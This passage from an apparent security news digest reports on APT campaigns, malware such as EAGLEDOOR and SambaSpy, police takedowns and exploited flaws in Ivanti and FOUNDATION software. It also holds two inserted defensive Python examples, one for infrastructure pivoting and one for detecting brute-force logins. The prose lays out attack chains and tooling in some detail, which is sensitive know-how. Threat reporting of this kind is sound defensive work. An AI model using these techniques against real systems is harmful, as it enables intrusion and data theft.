It described the activity, tracked by CrowdStrike under the moniker Famous Chollima, as a "complex, industrial, scaled nation-state operation" and that it poses a "serious risk for any company with remote-only employees."
Chinese Hackers Exploit GeoServer Flaw to Target APAC Nations with EAGLEDOOR Malware
23.9.24 Virus The Hacker News
A suspected advanced persistent threat (APT) originating from China targeted a government organization in Taiwan, and possibly other countries in the Asia-Pacific (APAC) region, by exploiting a recently patched critical security flaw impacting OSGeo GeoServer GeoTools.
The intrusion activity, which was detected by Trend Micro in July 2024, has been attributed to a threat actor dubbed Earth Baxia.
"Based on the collected phishing emails, decoy documents, and observations from incidents, it appears that the targets are primarily government agencies, telecommunication businesses, and the energy industry in the Philippines, South Korea, Vietnam, Taiwan, and Thailand," researchers Ted Lee, Cyris Tseng, Pierre Lee, Sunny Lu, and Philip Chen said.
The discovery of lure documents in Simplified Chinese points to China being one of the affected countries as well, although the cybersecurity company said it does not have enough information to determine what sectors within the country have been singled out.
The multi-stage infection chain process leverages two different techniques, using spear-phishing emails and the exploitation of the GeoServer flaw (CVE-2024-36401, CVSS score: 9.8), to ultimately deliver Cobalt Strike and a previously unknown backdoor codenamed EAGLEDOOR, which allows for information gathering and payload delivery.
"The threat actor employs GrimResource and AppDomainManager injection to deploy additional payloads, aiming to lower the victim's guard," the researchers noted, adding the former method is used to download next-stage malware via a decoy MSC file dubbed RIPCOY embedded within a ZIP archive attachment.
It's worth mentioning here that Japanese cybersecurity company NTT Security Holdings recently detailed an activity cluster with links to APT41 that it said used the same two techniques to target Taiwan, the Philippines military, and Vietnamese energy organizations.
It's likely that these two intrusion sets are related, given the overlapping use of Cobalt Strike command-and-control (C2) domains that mimic Amazon Web Services, Microsoft Azure (e.g., "s3cloud-azure," "s2cloud-amazon," "s3bucket-azure," and "s3cloud-azure"), and Trend Micro itself ("trendmicrotech").
The end goal of the attacks is to deploy a custom variant of Cobalt Strike, which acts as a launchpad for the EAGLEDOOR backdoor ("Eagle.dll") via DLL side-loading.
The malware supports four methods to communicate with the C2 server over DNS, HTTP, TCP, and Telegram. While the first three protocols are used to transmit the victim status, the core functionality is realized through the Telegram Bot API to upload and download files, and execute additional payloads. The harvested data is exfiltrated via curl.exe.
"Earth Baxia, likely based in China, conducted a sophisticated campaign targeting government and energy sectors in multiple APAC countries," the researchers pointed out.
"They used advanced techniques like GeoServer exploitation, spear-phishing, and customized malware (Cobalt Strike and EAGLEDOOR) to infiltrate and exfiltrate data. The use of public cloud services for hosting malicious files and the multi-protocol support of EAGLEDOOR highlight the complexity and adaptability of their operations."
Hacktivist Group Twelve Targets Russian Entities with Destructive Cyber Attacks
20.9.24 APT The Hacker News
A hacktivist group known as Twelve has been observed using an arsenal of publicly available tools to conduct destructive cyber attacks against Russian targets.
"Rather than demand a ransom for decrypting data, Twelve prefers to encrypt victims' data and then destroy their infrastructure with a wiper to prevent recovery," Kaspersky said in a Friday analysis.
"The approach is indicative of a desire to cause maximum damage to target organizations without deriving direct financial benefit."
The hacking group, believed to have been formed in April 2023 following the onset of the Russo-Ukrainian war, has a track record of mounting cyber attacks that aim to cripple victim networks and disrupt business operations.
It has also been observed conducting hack-and-leak operations that exfiltrate sensitive information, which is then shared on its Telegram channel.
Kaspersky said Twelve shares infrastructural and tactical overlaps with a ransomware group called DARKSTAR (aka COMET or Shadow), raising the possibility that the two intrusion sets are related to one another or part of the same activity cluster.
"At the same time, whereas Twelve's actions are clearly hacktivist in nature, DARKSTAR sticks to the classic double extortion pattern," the Russian cybersecurity vendor said. "This variation of objectives within the syndicate underscores the complexity and diversity of modern cyberthreats."
The attack chains start with gaining initial access by abusing valid local or domain accounts, after which the Remote Desktop Protocol (RDP) is used to facilitate lateral movement. Some of these attacks are also carried out via the victim's contractors.
"To do this, they gained access to the contractor's infrastructure and then used its certificate to connect to its customer's VPN," Kaspersky noted. "Having obtained access to that, the adversary can connect to the customer's systems via the Remote Desktop Protocol (RDP) and then penetrate the customer's infrastructure."
Prominent among the other tools used by Twelve are Cobalt Strike, Mimikatz, Chisel, BloodHound, PowerView, adPEAS, CrackMapExec, Advanced IP Scanner, and PsExec for credential theft, discovery, network mapping, and privilege escalation. The malicious RDP connections to the system are tunneled through ngrok.
Also deployed are PHP web shells with capabilities to execute arbitrary commands, move files, or send emails. These programs, such as the WSO web shell, are readily available on GitHub.
In one incident investigated by Kaspersky, the threat actors are said to have exploited known security vulnerabilities (e.g., CVE-2021-21972 and CVE-2021-22005) in VMware vCenter to deliver a web shell that then was used to drop a backdoor dubbed FaceFish.
"To gain a foothold in the domain infrastructure, the adversary used PowerShell to add domain users and groups, and to modify ACLs (Access Control Lists) for Active Directory objects," it said. "To avoid detection, the attackers disguised their malware and tasks under the names of existing products or services."
Some of the names used include "Update Microsoft," "Yandex," "YandexUpdate," and "intel.exe."
The attacks are also characterized by the use of a PowerShell script ("Sophos_kill_local.ps1") to terminate processes related to Sophos security software on the compromised host.
The concluding stages entail using the Windows Task Scheduler to launch ransomware and wiper payloads, but not before gathering and exfiltrating sensitive information about their victims via a file-sharing service called DropMeFiles in the form of ZIP archives.
"The attackers used a version of the popular LockBit 3.0 ransomware, compiled from publicly available source code, to encrypt the data," Kaspersky researchers said. "Before starting work, the ransomware terminates processes that may interfere with the encryption of individual files."
The wiper, identical to the Shamoon malware, rewrites the master boot record (MBR) on connected drives and overwrites all file contents with randomly generated bytes, effectively preventing system recovery.
"The group sticks to a publicly available and familiar arsenal of malware tools, which suggests it makes none of its own," Kaspersky noted. "This makes it possible to detect and prevent Twelve's attacks in due time."
Ukraine Bans Telegram Use for Government and Military Personnel
20.9.24 Social The Hacker News
Ukraine has restricted the use of the Telegram messaging app by government officials, military personnel, and other defense and critical infrastructure workers, citing national security concerns.
The ban was announced by the National Coordination Centre for Cybersecurity (NCCC) in a post shared on Facebook.
"I have always advocated and advocate for freedom of speech, but the issue of Telegram is not a question of freedom of speech, it is a matter of national security," Kyrylo Budanov, head of Ukraine's GUR military intelligence agency, said.
Ukraine's National Security and Defense Council (NSDC) said that Telegram is "actively used by the enemy" to launch cyber attacks, spread phishing messages and malicious software, track users' whereabouts, and gather intelligence to help the Russian military target Ukraine's facilities with drones and missiles.
To that end, the use of Telegram has been proscribed on official devices of employees of state authorities, military personnel, employees of the security and defense sector, as well as enterprises that are operators of critical infrastructure.
It's worth noting that the ban does not extend to personal phones, or people who use the app as part of their official duties.
In a statement shared with Reuters, Telegram said it has not provided any personal data to any country, including Russia, and that deleted messages are permanently deleted with no way of recovering them.
The development comes weeks after Telegram's CEO was arrested in France and then released on bail in connection with an investigation into the use of the popular messaging app for child pornography, drug trafficking, and fraud.
Europol Shuts Down Major Phishing Scheme Targeting Mobile Phone Credentials
20.9.24 BigBrothers The Hacker News
Law enforcement authorities have announced the takedown of an international criminal network that leveraged a phishing platform to unlock stolen or lost mobile phones.
The phishing-as-a-service (PhaaS) platform, called iServer, is estimated to have claimed more than 483,000 victims globally, led by Chile (77,000), Colombia (70,000), Ecuador (42,000), Peru (41,500), Spain (30,000), and Argentina (29,000).
"The victims are mainly Spanish-speaking nationals from European, North American and South American countries," Europol said in a press statement.
The action, dubbed Operation Kaerb, involved the participation of law enforcement and judicial agencies from Spain, Argentina, Chile, Colombia, Ecuador, and Peru.
Pursuant to the joint exercise that took place between September 10 and 17, an Argentinian national responsible for developing and running the PhaaS service since 2018 has been arrested.
In total, the operation led to 17 arrests, 28 searches, and the seizure of 921 items, including mobile phones, electronic devices, vehicles, and weapons. As many as 1.2 million mobile phones are believed to have been unlocked to date.
"While iServer was essentially an automated phishing platform, its specific focus on harvesting credentials to unlock stolen phones set it apart from typical phishing-as-a-service offerings," Group-IB said.
iServer, per the Singapore-based company, offered a web interface that enabled low-skilled criminals, known as "unlockers," to siphon device passcodes and user credentials for cloud-based mobile platforms, essentially permitting them to bypass Lost Mode and unlock the devices.
The criminal syndicate's administrator advertised the access to these unlockers, who, in turn, used iServer to not only perform phishing unlocks, but also to sell their offerings to other third-parties, such as phone thieves.
The unlockers are also responsible for sending bogus messages to phone theft victims that aim to gather data allowing access to those devices. This is accomplished by sending SMS texts that urge the recipients to locate their lost phone by clicking on a link.
This triggers a redirection chain that ultimately takes the victim to a landing page prompting them to enter their credentials, device passcode, and two-factor authentication (2FA) codes, which are then abused to gain illicit access to the device, turn off Lost Mode, and unlink the device from the owner's account.
"iServer automates the creation and delivery of phishing pages that imitate popular cloud-based mobile platforms, featuring several unique implementations that enhance its effectiveness as a cybercrime tool," Group-IB said.
Ghost Platform Goes Down in Global Action
The development comes as Europol and the Australian Federal Police (AFP) revealed the dismantling of an encrypted communications network called Ghost ("www.ghostchat[.]net") that facilitated serious and organized crime across the world.
The platform, which came bundled with a custom Android smartphone for about $1,590 for a six-month subscription, was used to conduct a wide range of illegal activities, such as trafficking, money laundering, and even acts of extreme violence. It's just the latest addition to a list of similar services like Phantom Secure, EncroChat, Sky ECC, and Exclu that have been shut down on similar grounds.
"The solution used three encryption standards and offered the option to send a message followed by a specific code which would result in the self-destruction of all messages on the target phone," Europol said. "This allowed criminal networks to communicate securely, evade detection, counter forensic measures, and coordinate their illegal operations across borders."
Several thousand people are thought to have used the platform, with around 1,000 messages exchanged over the service every day prior to its disruption.
Over the course of the investigation that commenced in March 2022, 51 suspects have been arrested: 38 in Australia, 11 in Ireland, one in Canada, and one in Italy belonging to the Italian Sacra Corona Unita mafia group.
Topping the list is a 32-year-old man from Sydney, New South Wales, who has been charged with creating and administering Ghost as part of Operation Kraken, along with several others who have been accused of using the platform for trafficking cocaine and cannabis, conducting drug distribution, and manufacturing a false terrorism plot.
It's believed that the administrator, Jay Je Yoon Jung, launched the criminal enterprise nine years ago, netting him millions of dollars in illegitimate profits. He was apprehended at his home in Narwee. The operation has also resulted in the takedown of a drug lab in Australia, as well as the confiscation of weapons, drugs, and €1 million in cash.
The AFP said it infiltrated the platform's infrastructure to stage a software supply chain attack by modifying the software update process to gain access to the content stored on 376 active handsets located in Australia.
"The encrypted communication landscape has become increasingly fragmented as a result of recent law enforcement actions targeting platforms used by criminal networks," Europol noted.
"Criminal actors, in response, are now turning to a variety of less-established or custom-built communication tools that offer varying degrees of security and anonymity. By doing so, they seek new technical solutions and also utilize popular communication applications to diversify their methods."
The law enforcement agency, besides stressing the need for access to communications among suspects to tackle serious crimes, called on private companies to ensure that their platforms don't become safe havens for bad actors and provide ways for lawful data access "under judicial oversight and in full respect of fundamental rights."
Germany Takes Down 47 Cryptocurrency Exchanges
The actions also coincide with Germany's seizure of 47 cryptocurrency exchange services hosted in the country that enabled illegal money laundering activities for cybercriminals, including ransomware groups, darknet dealers, and botnet operators. The operation has been codenamed Final Exchange.
The services have been accused of failing to implement Know Your Customer (KYC) or anti-money laundering programs and intentionally obscuring the source of criminally obtained funds, thereby allowing cybercrime to flourish. No arrests were publicly announced.
"The Exchange services enabled barter transactions without going through a registration process and without checking proof of identity," the Federal Criminal Police Office (aka Bundeskriminalamt) said. "The offer was aimed at quickly, easily and anonymously exchanging cryptocurrencies into other crypto or digital currencies in order to conceal their origin."
U.S. DoJ Charges Two for $230 Million Cryptocurrency Scam
Capping off the law enforcement efforts to combat cybercrime, the U.S. Department of Justice (DoJ) said two suspects have been arrested and charged with conspiracy to steal and launder over $230 million in cryptocurrency from an unnamed victim in Washington D.C.
Malone Lam, 20, and Jeandiel Serrano, 21, and other co-conspirators are alleged to have carried out cryptocurrency thefts at least since August 2024 by gaining access to victims' accounts, which were then laundered through various exchanges and mixing services.
The ill-gotten proceeds were then used to fund an extravagant lifestyle, such as international travel, nightclubs, luxury automobiles, watches, jewelry, designer handbags, and rental homes in Los Angeles and Miami.
"They laundered the proceeds, including by moving the funds through various mixers and exchanges using 'peel chains,' pass-through wallets, and virtual private networks (VPNs) to mask their true identities," the DoJ said.
Iranian APT UNC1860 Linked to MOIS Facilitates Cyber Intrusions in Middle East
20.9.24 APT The Hacker News
An Iranian advanced persistent threat (APT) actor likely affiliated with the Ministry of Intelligence and Security (MOIS) is now acting as an initial access facilitator that provides remote access to target networks.
Google-owned Mandiant is tracking the activity cluster under the moniker UNC1860, which it said shares similarities with intrusion sets tracked by Microsoft, Cisco Talos, and Check Point as Storm-0861 (formerly DEV-0861), ShroudedSnooper, and Scarred Manticore, respectively.
"A key feature of UNC1860 is its collection of specialized tooling and passive backdoors that [...] supports several objectives, including its role as a probable initial access provider and its ability to gain persistent access to high-priority networks, such as those in the government and telecommunications space throughout the Middle East," the company said.
The group first came to light in July 2022 in connection with destructive cyber attacks targeting Albania with a ransomware strain called ROADSWEEP, the CHIMNEYSWEEP backdoor, and a ZEROCLEAR wiper variant (aka Cl Wiper), with subsequent intrusions in Albania and Israel leveraging new wipers dubbed No-Justice and BiBi (aka BABYWIPER).
Mandiant described UNC1860 as a "formidable threat actor" that maintains an arsenal of passive backdoors that are designed to obtain footholds into victim networks and set up long-term access without attracting attention.
Among these tools are two GUI-operated malware controllers tracked as TEMPLEPLAY and VIROGREEN, which are said to provide other MOIS-associated threat actors with remote access to victim environments using the Remote Desktop Protocol (RDP).
Specifically, these controllers are designed to provide third-party operators an interface that offers instructions on the ways custom payloads could be deployed and post-exploitation activities such as internal scanning could be carried out within the target network.
Mandiant said it identified overlaps between UNC1860 and APT34 (aka Hazel Sandstorm, Helix Kitten, and OilRig) in that organizations compromised by the latter in 2019 and 2020 were previously infiltrated by UNC1860, and vice versa. Furthermore, both the clusters have been observed pivoting to Iraq-based targets, as recently highlighted by Check Point.
The attack chains involve leveraging initial access gained by opportunistic exploitation of vulnerable internet-facing servers to drop web shells and droppers like STAYSHANTE and SASHEYAWAY, with the latter leading to the execution of implants, such as TEMPLEDOOR, FACEFACE, and SPARKLOAD, that are embedded within it.
"VIROGREEN is a custom framework used to exploit vulnerable SharePoint servers with CVE-2019-0604," the researchers said, adding that it controls STAYSHANTE, along with a backdoor referred to as BASEWALK.
"The framework provides post-exploitation capabilities including [...] controlling post-exploitation payloads, backdoors (including the STAYSHANTE web shell and the BASEWALK backdoor) and tasking; controlling a compatible agent regardless of how the agent has been implanted; and executing commands and uploading/downloading files."
TEMPLEPLAY (internally named Client Http), for its part, serves as the .NET-based controller for TEMPLEDOOR. It supports backdoor instructions for executing commands via cmd.exe, upload/download files from and to the infected host, and proxy connection to a target server.
It's believed that the adversary has in its possession a diverse collection of passive tools and main-stage backdoors that align with its initial access, lateral movement, and information gathering goals.
Some of the other tools of note documented by Mandiant are listed below -
OATBOAT, a loader that loads and executes shellcode payloads
TOFUDRV, a malicious Windows driver that overlaps with WINTAPIX
TOFULOAD, a passive implant that employs undocumented Input/Output Control (IOCTL) commands for communication
TEMPLEDROP, a repurposed version of an Iranian antivirus software Windows file system filter driver named Sheed AV that's used to protect the files it deploys from modification
TEMPLELOCK, a .NET defense evasion utility that's capable of killing the Windows Event Log service
TUNNELBOI, a network controller capable of establishing a connection with a remote host and managing RDP connections
"As tensions continue to ebb and flow in the Middle East, we believe this actor's adeptness in gaining initial access to target environments represents a valuable asset for the Iranian cyber ecosystem that can be exploited to answer evolving objectives as needs shift," researchers Stav Shulman, Matan Mimran, Sarah Bock, and Mark Lechtik said.
The development comes as the U.S. government revealed Iranian threat actors' ongoing attempts to influence and undermine the upcoming U.S. elections by stealing non-public material from former President Donald Trump's campaign.
"Iranian malicious cyber actors in late June and early July sent unsolicited emails to individuals then associated with President Biden's campaign that contained an excerpt taken from stolen, non-public material from former President Trump's campaign as text in the emails," the government said.
"There is currently no information indicating those recipients replied. Furthermore, Iranian malicious cyber actors have continued their efforts since June to send stolen, non-public material associated with former President Trump's campaign to U.S. media organizations."
Iran's ramping up of its cyber operations against its perceived rivals also comes at a time when the country has become increasingly active in the Middle East region.
Late last month, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned that the Iranian APT Lemon Sandstorm (aka Fox Kitten) has carried out ransomware attacks by clandestinely partnering with NoEscape, RansomHouse, and BlackCat (aka ALPHV) crews.
Censys' analysis of the hacking group's attack infrastructure has since uncovered other, currently active hosts that are likely part of it, based on commonalities in geolocation, Autonomous System Numbers (ASNs), and identical patterns of ports and digital certificates.
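The pivoting described above, turned into a small scoring routine, as an added example (this is not Censys' method or code): each scanned host is scored on how many of the traits the article names (ASN, geolocation, port pattern, certificate) it shares with any seed host already known to be attacker infrastructure, and hosts over a threshold are returned best first. The hosts, ASNs, country codes, certificate fingerprints and weights are constructed placeholders for the demonstration.

```python
"""Pivot from known attack infrastructure to hosts that likely belong to it.

Added example, not Censys' method or code: each scanned host is scored on
how many of the traits the article names (ASN, geolocation, port pattern,
certificate) it shares with any seed host, and those over a threshold are
returned best first. All hosts, ASNs, country codes and certificate
fingerprints below are constructed placeholders.
"""
from dataclasses import dataclass
from typing import FrozenSet, Optional


@dataclass(frozen=True)
class Host:
    ip: str
    asn: int
    country: str
    ports: FrozenSet[int]
    cert_sha256: Optional[str]  # None when the host serves no TLS certificate


# An identical certificate is the strongest link; ASN or country alone is weak
# because many unrelated hosts share them. Weights are this example's choice.
WEIGHTS = {"cert": 4, "ports": 2, "asn": 1, "country": 1}


def shared_traits(a, b):
    """Set of trait names on which hosts a and b agree."""
    traits = set()
    if a.cert_sha256 is not None and a.cert_sha256 == b.cert_sha256:
        traits.add("cert")
    if a.ports == b.ports:
        traits.add("ports")
    if a.asn == b.asn:
        traits.add("asn")
    if a.country == b.country:
        traits.add("country")
    return traits


def pivot(seeds, scanned, min_score=3):
    """Return [(host, score, traits, seed_ip)] for scanned hosts whose best
    overlap with a seed reaches min_score, highest score first."""
    seed_ips = {s.ip for s in seeds}
    hits = []
    for host in scanned:
        if host.ip in seed_ips:  # already known, nothing to pivot to
            continue
        best = None
        for seed in seeds:
            traits = shared_traits(host, seed)
            score = sum(WEIGHTS[t] for t in traits)
            if best is None or score > best[1]:
                best = (host, score, frozenset(traits), seed.ip)
        if best is not None and best[1] >= min_score:
            hits.append(best)
    hits.sort(key=lambda h: (-h[1], h[0].ip))
    return hits


# Constructed seed hosts (known-bad) and a constructed scan sample.
SEED_HOSTS = [
    Host("203.0.113.10", 64500, "AA", frozenset({443, 8443}), "cert-A"),
    Host("203.0.113.11", 64500, "AA", frozenset({443, 8443}), "cert-B"),
]
SCANNED_HOSTS = [
    Host("203.0.113.10", 64500, "AA", frozenset({443, 8443}), "cert-A"),  # a seed itself
    Host("198.51.100.5", 64500, "AA", frozenset({443, 8443}), "cert-A"),  # certificate reuse
    Host("198.51.100.6", 64500, "AA", frozenset({443, 8443}), None),      # same ports/ASN/geo
    Host("198.51.100.7", 64500, "BB", frozenset({22, 80}), None),         # ASN only
    Host("192.0.2.9", 64501, "AA", frozenset({443}), "cert-Z"),           # country only
]

if __name__ == "__main__":
    for host, score, traits, seed_ip in pivot(SEED_HOSTS, SCANNED_HOSTS):
        print(f"{host.ip} score={score} shares {sorted(traits)} with seed {seed_ip}")
```

The threshold is deliberately above the weight of ASN or country alone, so a host is only surfaced when it shares a certificate or a full port pattern with a seed, or several weak traits at once; the weak-only candidates are exactly the ones that produce false positives when a hosting provider is shared with thousands of legitimate customers.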
"Despite attempts at obfuscation, diversion, and randomness, humans still must instantiate, operate, and decommission digital infrastructure," Censys' Matt Lembright said.
"Those humans, even if they rely upon technology to create randomization, almost always will follow some sort of pattern whether it be similar Autonomous Systems, geolocations, hosting providers, software, port distributions or certificate characteristics."
Chrome Users Can Now Sync Passkeys Across Devices with New Google PIN Feature
20.9.24 Safety The Hacker News
Google on Thursday unveiled a Password Manager PIN to let Chrome web users sync their passkeys across Windows, macOS, Linux, ChromeOS, and Android devices.
"This PIN adds an additional layer of security to ensure your passkeys are end-to-end encrypted and can't be accessed by anyone, not even Google," Chrome product manager Chirag Desai said.
The PIN is a six-digit code by default, although it's also possible to create a longer alpha-numeric PIN by selecting "PIN options."
This marks a change from the previous status quo, where users could only save passkeys to Google Password Manager on Android.
While the passkeys could be used on other platforms, it was necessary to scan a QR code using the device where they were generated.
The latest change removes that step, making it a lot easier for users to sign in to online services using passkeys by simply scanning their biometrics. Google noted that support for iOS is expected to arrive soon.
This, however, requires the users to know either the Password Manager PIN or the screen lock for their Android devices before using passkeys on a new device.
"These recovery factors will allow you to securely access your saved passkeys and sync new ones across your computers and Android devices," Desai said.
The development comes as the tech giant said passkeys are being used by more than 400 million Google accounts as of May 2024. Two months later, the phishing-resistant alternative was made available to high-risk users via its Advanced Protection Program (APP).
Critical Ivanti Cloud Appliance Vulnerability Exploited in Active Cyberattacks
20.9.24 Vulnerability The Hacker News
Ivanti has revealed that a critical security flaw impacting Cloud Service Appliance (CSA) has come under active exploitation in the wild.
The new vulnerability, assigned the CVE identifier CVE-2024-8963, carries a CVSS score of 9.4 out of a maximum of 10.0. It was "incidentally addressed" by the company as part of CSA 4.6 Patch 519 and CSA 5.0.
"Path Traversal in the Ivanti CSA before 4.6 Patch 519 allows a remote unauthenticated attacker to access restricted functionality," the company said in a Thursday bulletin.
It also noted that the flaw could be chained with CVE-2024-8190 (CVSS score: 7.2), permitting an attacker to bypass admin authentication and execute arbitrary commands on the appliance.
Ivanti has further warned that it's "aware of a limited number of customers who have been exploited by this vulnerability," days after it disclosed active exploitation attempts targeting CVE-2024-8190.
This indicates that the threat actors behind the activity are combining the twin flaws to achieve code execution on susceptible devices.
The development has prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to add the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to apply the fixes by October 10, 2024.
Users are highly recommended to upgrade to CSA version 5.0 as soon as possible, as version 4.6 is end-of-life and no longer supported.
Hackers Exploit Default Credentials in FOUNDATION Software to Breach Construction Firms
20.9.24 Vulnerability The Hacker News
Threat actors have been observed targeting the construction sector by infiltrating the FOUNDATION Accounting Software, according to new findings from Huntress.
"Attackers have been observed brute-forcing the software at scale, and gaining access simply by using the product's default credentials," the cybersecurity company said.
Targets of the emerging threat include plumbing, HVAC (heating, ventilation, and air conditioning), concrete, and other related sub-industries.
The FOUNDATION software comes with a Microsoft SQL (MS SQL) Server to handle database operations, and, in some cases, has the TCP port 4243 open to directly access the database via a mobile app.
Huntress said the server includes two high-privileged accounts: "sa," a default system administrator account, and "dba," an account created by FOUNDATION. Both are often left with unchanged default credentials.
A consequence is that threat actors could brute-force the server and then leverage the xp_cmdshell configuration option to run arbitrary shell commands.
"This is an extended stored procedure that allows the execution of OS commands directly from SQL, enabling users to run shell commands and scripts as if they had access right from the system command prompt," Huntress noted.
First signs of the activity were detected by Huntress on September 14, 2024, with about 35,000 brute-force login attempts recorded against an MS SQL server on one host before access was gained.
Of the 500 hosts running the FOUNDATION software across the endpoints protected by the company, 33 of them have been found to be publicly accessible with default credentials. To mitigate the risk posed by such attacks, it's recommended to rotate default account credentials, cease exposing the application over the public internet if possible, and disable the xp_cmdshell option where appropriate.
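The brute-force pattern Huntress describes (tens of thousands of failed logins against a default account, then a success) is visible in the SQL Server error log if login auditing is on. The following added example, which is neither Huntress' nor FOUNDATION's code, parses error-log style logon lines, counts failures per source address and account, and reports default accounts that were hammered, noting whether a success followed. The log lines and addresses are constructed, the exact line wording is an assumption about the common error-log format, and successful logons only appear when the server's login auditing level records successes as well as failures.

```python
"""Flag brute-force activity against the default MS SQL accounts.

Added example (not Huntress' or FOUNDATION's code): it parses SQL Server
error-log style logon lines, counts failures per source and account, and
reports default accounts that were hammered, noting whether a success
followed. The log lines and addresses below are constructed, and the
line wording is an assumption about the common error-log format.
"""
import re
from collections import defaultdict
from datetime import datetime

# Accounts the Huntress report calls out as shipping with default credentials.
DEFAULT_ACCOUNTS = {"sa", "dba"}

# Assumed error-log layout: "<timestamp> Logon  Login failed|succeeded for
# user '<name>'. ... [CLIENT: <ip>]". Successful logons only appear when the
# server's login auditing level records successes as well as failures.
LOGON_LINE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+Logon\s+"
    r"Login (?P<outcome>failed|succeeded) for user '(?P<user>[^']+)'"
    r".*\[CLIENT: (?P<ip>[\d.]+)\]"
)

# Constructed sample: 120 failures against 'sa' from one address, then a
# success from the same address; a lone 'dba' failure; a normal service login.
SAMPLE_LOG = [
    f"2024-09-14 02:{i // 60:02d}:{i % 60:02d}.47 Logon       Login failed for "
    f"user 'sa'. Reason: Password did not match that for the login provided. "
    f"[CLIENT: 198.51.100.23]"
    for i in range(120)
] + [
    "2024-09-14 02:02:05.10 Logon       Login succeeded for user 'sa'. "
    "Connection made using SQL Server authentication. [CLIENT: 198.51.100.23]",
    "2024-09-14 02:02:09.00 Logon       Login failed for user 'dba'. Reason: "
    "Password did not match that for the login provided. [CLIENT: 203.0.113.8]",
    "2024-09-14 08:15:00.00 Logon       Login succeeded for user 'app_svc'. "
    "Connection made using SQL Server authentication. [CLIENT: 10.0.0.5]",
]


def parse_logons(lines):
    """Yield (timestamp, outcome, user, ip) for every logon line; skip the rest."""
    for line in lines:
        m = LOGON_LINE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
            yield ts, m["outcome"], m["user"], m["ip"]


def analyze_logons(lines, threshold=50):
    """Return {(ip, user): {"failures": n, "success_after_failures": bool}}
    for default accounts whose failure count from one source reaches the
    threshold. A success following failures is the strongest signal: it is
    the point at which the brute force worked."""
    stats = defaultdict(lambda: {"failures": 0, "success_after_failures": False})
    for _ts, outcome, user, ip in sorted(parse_logons(lines)):  # time order
        entry = stats[(ip, user)]
        if outcome == "failed":
            entry["failures"] += 1
        elif entry["failures"] > 0:
            entry["success_after_failures"] = True
    return {
        key: entry
        for key, entry in stats.items()
        if key[1] in DEFAULT_ACCOUNTS and entry["failures"] >= threshold
    }


if __name__ == "__main__":
    for (ip, user), entry in analyze_logons(SAMPLE_LOG).items():
        state = "SUCCEEDED" if entry["success_after_failures"] else "ongoing"
        print(f"{ip} -> '{user}': {entry['failures']} failures, brute force {state}")
```

A hit with `success_after_failures` set means the account should be treated as compromised, not merely attacked: rotate its password, review what was run afterwards, and confirm xp_cmdshell is off (in T-SQL, `sp_configure 'xp_cmdshell', 0` followed by `RECONFIGURE`, after enabling `show advanced options`). The threshold only governs noise; with the product's default credentials in play, even a handful of failures followed by a success from an unfamiliar address deserves attention.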
New Brazilian-Linked SambaSpy Malware Targets Italian Users via Phishing Emails
19.9.24 Virus The Hacker News
A previously undocumented malware called SambaSpy is exclusively targeting users in Italy via a phishing campaign orchestrated by a suspected Brazilian Portuguese-speaking threat actor.
"Threat actors usually try to cast a wide net to maximize their profits, but these attackers are focused on just one country," Kaspersky said in a new analysis. "It's likely that the attackers are testing the waters with Italian users before expanding their operation to other countries."
The starting point of the attack is a phishing email that either includes an HTML attachment or an embedded link that initiates the infection process. Should the HTML attachment be opened, a ZIP archive containing an interim downloader or dropper is used to deploy and launch the multi-functional RAT payload.
The downloader, for its part, is responsible for fetching the malware from a remote server. The dropper, on the other hand, does the same thing, but extracts the payload from the archive instead of retrieving it from an external location.
The second infection chain with the booby-trapped link is a lot more elaborate, as clicking it redirects the user to a legitimate invoice hosted on FattureInCloud if they are not the intended target.
In an alternate scenario, clicking on the same URL takes the victim to a malicious web server that serves an HTML page with JavaScript code featuring comments written in Brazilian Portuguese.
"It redirects users to a malicious OneDrive URL but only if they are running Edge, Firefox, or Chrome with their language set to Italian," the Russian cybersecurity vendor said. "If the users don't pass these checks, they stay on the page."
Users who meet these requirements are served a PDF document hosted on Microsoft OneDrive that instructs the users to click on a hyperlink to view the document, following which they are led to a malicious JAR file hosted on MediaFire containing either the downloader or the dropper as before.
A fully-featured remote access trojan developed in Java, SambaSpy is nothing short of a Swiss Army knife that can handle file system management, process management, remote desktop management, file upload/download, webcam control, keylogging and clipboard tracking, screenshot capture, and remote shell.
It's also equipped to load additional plugins at runtime by launching a file on the disk previously downloaded by the RAT, allowing it to augment its capabilities as needed. On top of that, it's designed to steal credentials from web browsers like Chrome, Edge, Opera, Brave, Iridium, and Vivaldi.
Infrastructure evidence suggests that the threat actor behind the campaign is also setting their sights on Brazil and Spain, pointing to an operational expansion.
"There are various connections with Brazil, such as language artifacts in the code and domains targeting Brazilian users," Kaspersky said. "This aligns with the fact that attackers from Latin America often target European countries with closely related languages, namely Italy, Spain, and Portugal."
New BBTok and Mekotio Campaigns Target Latin America
The development comes weeks after Trend Micro warned of a surge in campaigns delivering banking trojans such as BBTok, Grandoreiro, and Mekotio targeting the Latin American region via phishing scams that utilize business transactions and judicial-related transactions as lures.
Mekotio "employs a new technique where the trojan's PowerShell script is now obfuscated, enhancing its ability to evade detection," the company said, highlighting BBTok's use of phishing links to download ZIP or ISO files containing LNK files that act as a trigger point for the infections.
The LNK file is used to advance to the next step by launching the legitimate MSBuild.exe binary, which is present within the ISO file. It subsequently loads a malicious XML file also hidden within the ISO archive, which then leverages rundll32.exe to launch the BBTok DLL payload.
"By using the legitimate Windows utility MSBuild.exe, attackers can execute their malicious code while evading detection," Trend Micro noted.
The attack chains associated with Mekotio commence with a malicious URL in the phishing email that, when clicked, directs the user to a bogus website that delivers a ZIP archive, which contains a batch file that's engineered to run a PowerShell script.
The PowerShell script acts as a second-stage downloader to launch the trojan by means of an AutoHotKey script, but not before conducting a reconnaissance of the victim environment to confirm it's indeed located in one of the targeted countries.
"More sophisticated phishing scams targeting Latin American users to steal sensitive banking credentials and carry out unauthorized banking transactions underscore the urgent need for enhanced cybersecurity measures against increasingly advanced methods employed by cybercriminals," Trend Micro researchers said.
"These trojans [have] grown increasingly adept at evading detection and stealing sensitive information while the gangs behind them become bolder in targeting larger groups for more profit."
New TeamTNT Cryptojacking Campaign Targets CentOS Servers with Rootkit
19.9.24 Cryptocurrency The Hacker News
